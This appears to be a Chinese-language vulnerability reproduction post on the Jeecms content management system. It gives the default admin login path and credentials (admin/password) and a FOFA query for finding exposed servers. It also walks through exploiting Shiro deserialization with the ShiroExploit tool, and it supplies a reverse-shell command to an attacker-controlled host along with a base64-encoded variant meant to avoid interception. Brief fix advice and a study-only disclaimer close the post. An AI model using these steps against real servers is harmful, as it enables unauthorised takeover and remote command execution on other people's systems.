簡介

Jeecms 是一個開源企業(yè)客戶關(guān)系管理快速開發(fā)基礎(chǔ)平臺，Java企業(yè)應(yīng)用開源框架，Java EE（J2EE）快速開發(fā)框架，使用經(jīng)典技術(shù)組合（Spring、Spring MVC、Apache Shiro、hibernate4、EasyUI、Jqgrid、Bootstrap UI），核心模塊如：組織機(jī)構(gòu)、角色用戶、權(quán)限授權(quán)、數(shù)據(jù)權(quán)限、內(nèi)容管理、工作流等功能。
在企業(yè)官網(wǎng)、新聞?wù)军c、OA資源管理等多個領(lǐng)域都有應(yīng)用。

由于使用的Apache Shiro 是低版本的，存在shiro反序列漏洞。

漏洞影響

弱口令進(jìn)入可獲取后臺權(quán)限，
反序列可rce 反彈shell

影響版本

版本 <=9.3

fofa app="jeecms"

漏洞復(fù)現(xiàn)

弱口令登錄

訪問默認(rèn)后臺登錄路徑 默認(rèn)賬號 admin/password

/jeeadmin/jeecms/login.do

image

默認(rèn)口令可進(jìn)入后臺

image

shiro反序列RCE

1.任意登錄 檢測是否存在疑是漏洞點

找到登錄入口后，輸入用戶名和密碼點擊登錄，查看響應(yīng)頭部，是否存在關(guān)鍵指紋
指紋:rememberMe=deleteme 如下圖

image

2.則使用工具進(jìn)行檢測 目標(biāo)地址填寫填寫該 request URL

image

可選擇第一選項 一直點擊下一步

image

程序會進(jìn)行逐個模塊檢測，當(dāng)出現(xiàn) [+] Find Valid Gadget:xxx 則代表存在shiro反序列化漏洞 例如

[*] Trying Gadget: Wicket1
[+] Find Valid Gadget: CommonsCollections10

附：ShiroExploit 工具可使用大佬的
https://github.com/feihong-cs/ShiroExploit-Deprecated

3.可直接執(zhí)行命令 或者反彈shell

linux環(huán)境的情況下 開啟監(jiān)聽 進(jìn)行shell反彈，如何反彈的基礎(chǔ)常識筆者不在這里贅述

# 使用自己的vps 進(jìn)行nc監(jiān)聽后 進(jìn)行反彈
bash -i >& /dev/tcp/ip/port 0>&1

為了防止被攔截和編碼等問題 我們需要進(jìn)行bash編碼 編碼工具 http://www.jackson-t.ca/runtime-exec-payloads.html

image

得到 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC9wb3J0IDA+JjE=}|{base64,-d}|{bash,-i}

執(zhí)行命令進(jìn)行反彈

image

修復(fù)建議

修改默認(rèn)登錄路徑
修改弱口令
修改shiro-context.xml最底下rememberMe管理器中的cipherKey

注意：本文僅供學(xué)習(xí)參考，非法傳播及使用產(chǎn)生的后果自行承擔(dān)，與本文作者無關(guān)

歡迎討論，持續(xù)更新中，感謝關(guān)注！